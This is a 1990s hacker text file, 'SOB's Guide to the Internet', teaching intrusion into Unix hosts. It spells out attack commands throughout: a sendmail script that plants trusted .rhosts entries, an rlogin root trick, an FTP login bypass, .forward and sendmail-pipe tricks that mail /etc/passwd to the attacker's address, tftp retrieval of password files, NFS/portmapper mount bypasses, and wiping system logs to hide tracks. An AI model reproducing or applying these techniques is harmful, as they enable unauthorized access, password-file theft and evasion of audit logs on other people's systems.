_________________ __________/\ ________ .__ .___ / _____/\_____ \\______ )/______ / _____/ __ __|__| __| _/____ \_____ \ / | \| | _// ___/ / \ ___| | \ |/ __ |/ __ \ / \/ | \ | \\___ \ \ \_\ \ | / / /_/ \ ___/ /_______ /\_______ /______ /____ > \______ /____/|__\____ |\___ > \/ \/ \/ \/ \/ \/ \/ __ __ .__ _/ |_ ____ _/ |_| |__ ____ \ __\/ _ \ \ __\ | \_/ __ \ | | ( <_> ) | | | Y \ ___/ |__| \____/ |__| |___| /\___ > \/ \/ .___ __ __ | | _____/ |_ ___________ ____ _____/ |_ | |/ \ __\/ __ \_ __ \/ \_/ __ \ __\ | | | \ | \ ___/| | \/ | \ ___/| | |___|___| /__| \___ >__| |___| /\___ >__| \/ \/ \/ \/ By Syncomm [SOB] "If god wanted the net to be secure he would have given it more Dan Farmers..." -Syncomm -()- Introduction... -()- The Internet is an immense place full of many kinds of sites that people used to spend whole lives scanning for the dialups to... It is also a foolish place full of bugs and careless sysadmins. One thing about Internet is certain... it is a one of the best places to hack! In this doc I'm not going to give you a STEP BY STEP guide on hacking out the interesting things you find on the "Information Super-Highway" (tm), due to the fact that hacking on the Internet can be an extremely entailing process... I will however take a look at some of the major bugs and allot of maneuvers that can still be used to attack most places on the net... -()- A VERY Brief History... -()- In the beginning the fools at the US Government made a big nationwide network. This in the end grew so large it split into two networks ARPANET and MILINET. ARPANET was dedicated to scientific research and Milinet was dedicated to the communication of military sites... Later thousands of other networks joined and the internet was born... -()- The Legacy of RLOGIN -()- "RLOGIN must have been designed by a hacker..." Crypt Keeper [SOB], P/S One of the easier ways of getting an account on a remote system is to RLOGIN into it... if your system is trusted you can get in without a passwd (A lightbulb goes off in an empty skull somewhere...) The way to get a trusted account is to have your site listed in a users .rhosts file, or in the /etc/hosts.equiv in a format like this... %cat .rhosts gnu.ai.mit.edu + % The "+" designates this as a trusted site and it doesn't require a passwd when someone from the mentioned system logs into that account from a remote site. When you do get on a system I suggest you see what .rhosts files you have access to with the command... %find / -name .rhosts -exec /bin/cat {} ";" That will give you a long list that you may want to edit in the future to "ensure" your access to the system. A good idea is to add a plus sign to the /etc/rhosts.equiv file to make ALL hosts trusted, you should do this immediately after you gain root privileges. One technique to make an .rhosts file on a remote site involves sendmail. Example: %cat evil # Evil Sendmail Script telnet site.name.com 25 << EOSM rcpt to:/home/name/.rhosts mail from: r3w+ data (garbage) . rcpt to: /home/name/.rhosts mail from:r3w+ data yoursite.name.com + . quit EOSM %/bin/sh evil Trying 666.666.666.1 Connected to satan.com Escape character is '^]'. Connection closed by foreign host. %rlogin site.name.com -l account name -*- Welcome to satan.com -*- satan% This trick works on all Sendmail previous to 5.59 from Berkeley. Another trick involving sendmail is to telnet to the site saying the mail is from "|/bin/echo "yoursite.name +" > /etc/hosts.equiv". AIX and Linux can sometimes be exploited with a HUGE rlogin hole which has been patched on most systems. The format is: %rlogin site.name.com -l -froot -*- Welcome to site.name.com -*- site%tprof -x /bin/sh This will give you root and allow you to edit all files. You may also want to take a look and make sure the system doesn't have an unpassworded "RSH" or remote shell... I found a few systems that I was able to RSH into and snoop around gathering information that helped me hack it in the future. -()- FTP and TFTP -()- File Transfer Protocol has been long abused to get passwd files from hosts... an old bug that still pops up occasional is "ftp -n". %ftp -n ftp> open site.name.com Connected to site.name.com 220 site.name.com FTP server ready. ftp> quote user ftp 331 Guest login okay, send ident as password. ftp> quote cwd ~root 530 Please send login with USER and PASS. ftp> quote pass ftp 230 Guest login okay, access restrictions apply. ftp> If this works you are in as root and can modify all directories and files. Another FTP trick is to login as "anonymous" or "ftp" then send a file called .forward to the directory. The .forward file should contain "|/bin/mail you@yoursite.com < /etc/passwd". Now mail a letter to "ftp" or "anonymous" and you get the passwd file in your mailbox. TFTP also has a huge bug on some systems. You almost never see this bug these days... but you never know! %tftp site.name.com tftp> get /etc/passwd This will get you the actual passwd files on some systems... -()-X Windows-()- X Windows is a big risk due to the fact they can be monitored remotely... take a look at the xwatch.sh file that SHOULD have come with this doc... -()- Sendmail -()- Alot of versions before sendmail 5.59 had a bug in which you could specify your name as a "|" then a command... such as mail from: "|/bin/mail you@your.site.name < /etc/passwd" Sendmail can also be helpful for finding users on a system with the 'expn' and 'vrfy' command as follows... %telnet target.com 25 Connecting to host target.com (666.666.666.1), port 25 connection open 220 target.com Sendmail 5.5/target ready at Sun, 7 July 94 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit Finding the mail alias "decode" can provide you with a nice bug... with decode you can add a site name to nearly any account (depending on who owns the decode account) Ex. % echo "your.site.name" | uuencode /home/idiot/.rhosts | mail decode@target.com -()- NIS -()- NIS, NFS, and almost every other form of RPC is plagued with bugs... With the proper tools almost anyone can get a passwd file from a system running NIS. The popular way is to use YPX (tm) which should have come with this doc. There are other better tools such as RPCToolKit and NFS (by Leendert) which allow an easier handling of sites running RPC. One important thing to note is that the directory /var/yp contains the domain name of host. So if the director /var/yp is world readable or if /var is exported then you have the domain name. Normally, a remote (network) file system is mounted by requesting the mount demon on the machine on which the file system resides to perform a mount RPC. The result of this RPC is the file handle of the root of remote file system. As a security measure the mount demon checks the source machine of the request against a list of allowable machines (this list is found in /etc/exports). If the requester's machine is not in the export list, the mount RPC will of course fail. One could argue against the fitness of this security approach, but in common day practice it seems sufficient. However, a special feature of the portmapper (alias rpcbind)allows you to circumvent this check. The portmapper provides an indirect(or proxy) RPC service. This service is very simple, in that respect that you provide the parameters of the RPC, send them to the portmapper and it will make the RPC call for you. This feature, as you by now probably have guessed, allows you to perform indirect RPC mount calls. Since the source of the request (in the mount demon's point of view) is his local machine such a request is often granted. This will only work if the local machine is mentioned in the export list for its own exportable file systems, but with netgroup facilities this is often the case. Note that when the mount call succeeds, we have a handle of the remote file system and there is no stopping us. Using this file handle we can perform NFS requests by directly addressing the remote NFS server. There is no need to do this through the portmapper as well since the NFS server doesn't do any further check if the requester can provide a good file handle. This gives us the advantage to provide our own Unix authentication information (something that can't be done using the portmapper's indirect RPC feature). This way it becomes possible to set the Unix user id. Both the portmapper bugs are used in Leendert's program NFS, so may be patched on some systems. -()- Evasion -()- It alwayes has been a good idea to erase your tracks on a remote host... a simple way to get yourself out of the system logs (ie. the UTMP, WTMP, syslog, etc.) is to use a program called ZAP, which AGAIN should be included with this doc. NOTE: You must be root to use this program. Be on the lookout for updates to this file on the following BBSs: ___ ___ : ___/ /\ /\ \___ ___/ / / _\________________________/_ \ \ \___ : | ___/ / / / /_ \ \ \ \ \___ _|_____/ / / / / // SOB MEMBER BOARDS \ \ \ \ \ \_____|_ /______/__/__/__/__/ /________________________________\ \__\__\__\__\______\ \ \ \ \ \ \ \________________________________/ / / / / / / \______\__\__\__\__\/ \/__/__/__/__/______/ : : ! Utopia -*SOB WORLD HQ*- (210) PRI-VITE ! | Social Deception -*SOB USHQ*- (606) 261-3442 | | Arrested Development -*SOB Holland HQ*- +31-77-547477 | | Lucid Nightmare -*SOB Eastern HQ*- (703) 758-1655 | | Celestial Woodlands -*SOB Dist. S.*- (409) 764-2843 | ! Purple Hell -*SOB Dist. S.*- (806) 791-0747 ! | Paradise Lost -*SOB Dist. S.*- (414) 476-3181 | | Cyberspace.net -*SOB I-Net Dist. S.*- /pub/SOB | :__________________ __________________: / / / / / /\________________________________/\ \ \ \ \ \ /______/__/__/__/__/ /________________________________\ \__\__\__\__\______\ \______\ \ \ \ \ \ _ / / / / / /______/ | \__\ \ \ \ \ // / / / /__/ | : \__\ \ \ \____________________________/ / / /__/ : \__\ \ / \ / /__/ \__\/ \/__/